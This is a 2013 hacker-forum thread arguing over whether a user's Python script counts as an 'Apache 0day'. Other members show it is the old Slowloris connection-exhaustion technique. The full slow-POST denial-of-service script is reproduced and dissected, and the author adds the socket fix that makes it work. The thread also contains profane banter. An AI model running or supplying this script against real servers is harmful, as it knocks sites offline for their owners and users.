[NEW] Apache 0day!!! only available on HTS [NEW]

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Thu Aug 22, 2013 11:13 am
([msg=76971]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

It it is a '1,473' day why does it work perfectly on my fully updated apache web server? :?:

funny. :mrgreen:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Thu Aug 22, 2013 11:52 am
([msg=76973]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

There is a difference between an exploit of a vulnerability, and tying up network resources.

The Slowloris software has been around since '09, and the attack has been known since well before that. It does not exploit a flaw in faulty code, it merely uses a clever method of leaving open connections. It affects more than just Apache, so it couldn't really be called an exploit, which usually has a fairly specific target.

If, however, you found a flaw in, say, the way Apache frees up old connections (improper memory management, pointer issues, etc) and crafted a special packet or came up with a method to exploit that, I'd call that 0day.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2825
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sat Aug 24, 2013 2:18 pm
([msg=77004]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Slowloris affect apache and a few other web servers, but does not affect all of them, such as IIS and NGINX. therefore it is an exploit.

What I have done is made an exploit that does a slowloris type affect via POST requests, and keeping them alive.

This is a 0day, there has been 0days and 0hours since it has been discovered or patched.
Exploits are more than just buffer overflows and memory corruption, there is SQLi and XSS 0days, that are just as devastating as this.

Maybe you are just jealous that I made a simple exploit you could have made yourself? :mrgreen:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Sat Aug 24, 2013 4:09 pm
([msg=77006]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Let's go through this line by line and we'll see if there is a 0day here:


Code: Select all
#!/usr/bin/python

#Apache Exploit developed by Th3_M4d_H4tt3r

#This exploit crashes (and consumes all connections to the server) within seconds.

Pretty standard stuff. Path to python executable, comment explaining program.


Code: Select all
#Th3_M4d_H4tt3r
#Attack: Infinite
#Defence: Infinite
#Inteligence: N/A
#Age: 13
#Orgin: Wonderland

l337 h4x0R b4nn3r pr0pz & sh0utz


Code: Select all
import socket
from time import sleep
import threading

More standard stuff


Code: Select all
print "Welcome to Th3_M4d_H4tt3r's 0day Exploit for apache 2.X.X"

More script-kiddie bullshit


Code: Select all
RHOST=raw_input("RHOST: ")
RPORT=int(raw_input("RPORT: "))

This must be the uber-tweak you mentioned to block teh skidzeez.


Code: Select all
def PostExploit(HOST, PORT):

I guess naming your function "PostExploit" counts as this being an exploit. Somehow.


Code: Select all
   while 1:
      try:
         s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
         s.connect(HOST, PORT)
         s.send('''POST / HTTP/1.1
Host: '''+HOST+'''
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: '''+HOST+''':'''+PORT+'''
Connection: keep-alive
Content-Type: multipart/form-data
Content-Length: 65535

''')
         for i in xrange(0, 65535):
            sleep(1)
            s.send("A")
         s.send("\n\n")
      except:
         pass
count = 0

Basic HTTP POST and other misc. python code


Code: Select all
while 1:
   try:
      Exploit = threading.Thread(target=PostExploit, args=(RHOST, RPORT,))
      Exploit.start()
      count = count+1
      print "Made "+str(count)+" connections."
      print "\033[2A"
   except:
      pass

Aha! A variable named Exploit! *Surely* this makes it a bonafide 0day!





In summary: There is nothing about your program that is unique, original, or cool. It is not a 0day. The guy who first discovered the attack and used it, however, did come up with something unique, original, and cool. You are simply applying the same technique. Here, let me demonstrate:

Code: Select all
#include <stdlib.h>

int main()
{
  printf("Fucknugget bitch-ass commodore 64 #yolo #dicktat #RonPaul");
}


There. It has been 0 days and 0 hours since someone has discovered this gem. Therefor, it is 0day. Yay.

^ Your logic.

-- Fin.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2825
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by -Ninjex- on Sat Aug 24, 2013 5:51 pm
([msg=77012]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Sorry, hatter, but Goatboy is correct.
However, it is a good thing that you are bringing content to hts, and I am thankful for that still.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
^(-.^)>
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1468
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sat Aug 24, 2013 6:29 pm
([msg=77015]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

His logic is correct, I do agree with him that, what I made is not a 0day, surely you all agree this is rather useful.

also, the tweak I said was no int(raw_input("RPORT"))
RPORT must be int() hur dur, the tweak I made is s.connect(HOST, PORT) wich should be s.connect((HOST, PORT))

any python coder who know how to use sockets will know that. :geek:
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Goatboy on Sat Aug 24, 2013 6:47 pm
([msg=77016]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Th3_M4d_H4tt3r wrote:His logic is correct, I do agree with him that, what I made is not a 0day, surely you all agree this is rather useful.

So why'd you argue me for so long?

Th3_M4d_H4tt3r wrote:any python coder who know how to use sockets will know that. :geek:

I used Python once, about 4 years ago, for a small FTP migration project. Forgive me if my knowledge isn't to par.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk
User avatar
Goatboy
Expert
Expert
 
Posts: 2825
Joined: Mon Jul 07, 2008 9:35 pm
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by anonHacker on Sat Aug 24, 2013 7:34 pm
([msg=77017]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Th3_M4d_H4tt3r wrote:Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

It it is a '1,473' day why does it work perfectly on my fully updated apache web server? :?:

funny. :mrgreen:
Evidently you don't know what 0day is. 0 day refers to "days of public disclosure." When it is publicly disclosed, that is day 1. This has already been known for a while. Whether or not it has been patched is a different issue. Also, if you post 0day to HTS, it is no longer 0day because HTS is publicly accessible (google crawls it, for one).

Also, 1337sp34k is pretty much a script kiddie thing these days. (These days being defined as the past 15 or more years.)
Last edited by anonHacker on Sun Aug 25, 2013 1:12 am, edited 1 time in total.
anonHacker
Experienced User
Experienced User
 
Posts: 76
Joined: Sun Jul 27, 2008 10:51 am
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by tgoe on Sat Aug 24, 2013 10:21 pm
([msg=77020]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

Brought a tear to my eye. Who is this "Goatboy" character anyway?
User avatar
tgoe
Contributor
Contributor
 
Posts: 668
Joined: Sun Sep 28, 2008 2:33 pm
Location: q3dm7
Blog: View Blog (0)


Re: [NEW] Apache 0day!!! only available on HTS [NEW]

Post by Th3_M4d_H4tt3r on Sun Aug 25, 2013 1:11 pm
([msg=77026]see Re: [NEW] Apache 0day!!! only available on HTS [NEW][/msg])

anonHacker wrote:
Th3_M4d_H4tt3r wrote:Yes I know what a 0day is, it means there has been 0 days and 0 hours since it has been patched or discovered.

It it is a '1,473' day why does it work perfectly on my fully updated apache web server? :?:

funny. :mrgreen:
Evidently you don't know what 0day is. 0 day refers to "days of public disclosure." When it is publicly disclosed, that is day 1. This has already been known for a while. Whether or not it has been patched is a different issue. Also, if you post 0day to HTS, it is no longer 0day because HTS is publicly accessible (google crawls it, for one).

Also, 1337sp34k is pretty much a script kiddie thing these days. (These days being defined as the past 15 or more years.)

I only use 1337sp34k in my usernames, as most of them are already taken.
alright I am in rage mode.

:evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil:
I THINK WE CAN ALL FUCKING AGREE THIS IS NO LONGER A 0DAYYHH!!!
:evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil: :evil:

I am done, lel convo ovher.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


PreviousNext

Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests

cron